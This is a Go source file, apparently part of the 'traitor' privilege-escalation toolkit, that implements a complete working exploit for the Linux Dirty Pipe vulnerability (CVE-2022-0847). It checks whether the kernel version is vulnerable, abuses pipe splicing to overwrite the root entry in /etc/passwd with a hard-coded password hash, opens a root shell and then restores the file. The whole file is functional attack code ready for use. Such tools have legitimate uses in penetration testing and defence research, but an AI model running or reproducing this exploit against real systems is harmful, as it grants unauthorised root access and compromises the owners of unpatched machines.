package cve20220847

import (
	"context"
	"errors"
	"fmt"
	"os"
	"regexp"
	"strconv"
	"strings"
	"syscall"

	"github.com/liamg/traitor/pkg/logger"
	"github.com/liamg/traitor/pkg/payloads"
	"github.com/liamg/traitor/pkg/shell"
	"github.com/liamg/traitor/pkg/state"
	"golang.org/x/sys/unix"
)

// see: https://dirtypipe.cm4all.com/
type cve20220847Exploit struct {
	pageSize int64
	log      logger.Logger
}

func New() *cve20220847Exploit {
	exp := &cve20220847Exploit{
		pageSize: 4096,
	}
	return exp
}

func (v *cve20220847Exploit) IsVulnerable(ctx context.Context, s *state.State, log logger.Logger) bool {

	r := regexp.MustCompile(`[0-9]+\.[0-9]+(\.[0-9]+)*`)
	ver := r.FindString(s.KernelVersion)

	var segments []int
	for _, str := range strings.Split(ver, ".") {
		n, err := strconv.Atoi(str)
		if err != nil {
			return false
		}
		segments = append(segments, n)
	}

	var major int
	var minor int
	var patch int

	if len(segments) < 3 {
		return false
	}

	major = segments[0]
	minor = segments[1]
	patch = segments[2]

	// affects Linux Kernel 5.8 and later versions, and has been fixed in Linux 5.16.11, 5.15.25 and 5.10.102
	switch {
	case major == 5 && minor < 8:
		return false
	case major > 5:
		return false
	case minor > 16:
		return false
	case minor == 16 && patch >= 11:
		return false
	case minor == 15 && patch >= 25:
		return false
	case minor == 10 && patch >= 102:
		return false
	}

	log.Printf("Kernel version %s is vulnerable!", ver)
	return true
}

func (v *cve20220847Exploit) Shell(ctx context.Context, s *state.State, log logger.Logger) error {
	return v.Exploit(ctx, s, log, payloads.Default)
}

func (v *cve20220847Exploit) Exploit(ctx context.Context, s *state.State, log logger.Logger, payload payloads.Payload) error {

	v.log = log

	log.Printf("Attempting to set root password...")
	passwdData, err := os.ReadFile("/etc/passwd")
	if err != nil {
		return err
	}
	backup := string(passwdData)
	if len(backup) > 4095 {
		backup = backup[:4095]
	}
	if string(passwdData[:4]) != "root" {
		return fmt.Errorf("unexpected data in /etc/passwd")
	}
	rootLine := "root:$1$traitor$ELjiH/IyoHuVv5Hxiqam21:0:0::/root:/bin/sh\n"
	if err := v.writeToFile("/etc/passwd", 4, []byte(rootLine[4:])); err != nil {
		return fmt.Errorf("failed to overwrite target file: %w", err)
	}

	defer func() {
		log.Printf("Restoring contents of /etc/passwd...")
		_ = v.writeToFile("/etc/passwd", 1, []byte(backup)[1:])
	}()

	log.Printf("Starting shell...")
	log.Printf("Please exit the shell once you are finished to ensure the contents of /etc/passwd is restored.")
	return shell.WithPassword("root", "traitor", log)
}

func (v *cve20220847Exploit) writeToFile(path string, offset int64, data []byte) error {

	if offset%v.pageSize == 0 {
		return errors.New("cannot write to an offset aligned with a page boundary")
	}

	v.log.Printf("Opening '%s' for read...", path)
	target, err := os.Open(path)
	if err != nil {
		return fmt.Errorf("failed to read target file: %w", err)
	}

	r, w, err := v.dirtyThatPipe()
	if err != nil {
		return fmt.Errorf("failed to create dirty pipe: %w", err)
	}
	defer func() {
		_ = r.Close()
		_ = w.Close()
	}()

	v.log.Printf("Splicing data...")
	offset--
	spliced, err := syscall.Splice(int(target.Fd()), &offset, int(w.Fd()), nil, 1, 0)
	if err != nil {
		return fmt.Errorf("splice error: %w", err)
	}
	if spliced <= 0 {
		return fmt.Errorf("splice failed (%d)", spliced)
	}

	v.log.Printf("Writing to dirty pipe...")
	if n, err := w.Write(data); err != nil {
		return fmt.Errorf("write failed: %w", err)
	} else if n < len(data) {
		return fmt.Errorf("write partially failed - %d bytes written", n)
	}

	v.log.Printf("Write of '%s' successful!", path)
	return nil
}

func (v *cve20220847Exploit) dirtyThatPipe() (r *os.File, w *os.File, err error) {

	v.log.Printf("Creating pipe...")
	r, w, err = os.Pipe()
	if err != nil {
		return nil, nil, fmt.Errorf("create failed: %w", err)
	}

	v.log.Printf("Determining pipe size...")
	size, err := unix.FcntlInt(w.Fd(), syscall.F_GETPIPE_SZ, -1)
	if err != nil {
		return nil, nil, fmt.Errorf("fcntl error: %w", err)
	}
	v.log.Printf("Pipe size is %d.", size)

	v.log.Printf("Filling pipe...")
	written := 0
	for written < size {
		writeSize := size - written
		if int64(writeSize) > v.pageSize {
			writeSize = int(v.pageSize)
		}
		n, err := w.Write(make([]byte, writeSize))
		if err != nil {
			return nil, nil, fmt.Errorf("pipe write failed: %w", err)
		}
		written += n
	}

	v.log.Printf("Draining pipe...")
	read := 0
	for read < size {
		readSize := size - read
		if int64(readSize) > v.pageSize {
			readSize = int(v.pageSize)
		}
		n, err := r.Read(make([]byte, readSize))
		if err != nil {
			return nil, nil, fmt.Errorf("pipe read failed: %w", err)
		}
		read += n
	}

	v.log.Printf("Pipe drained.")
	return r, w, nil
}
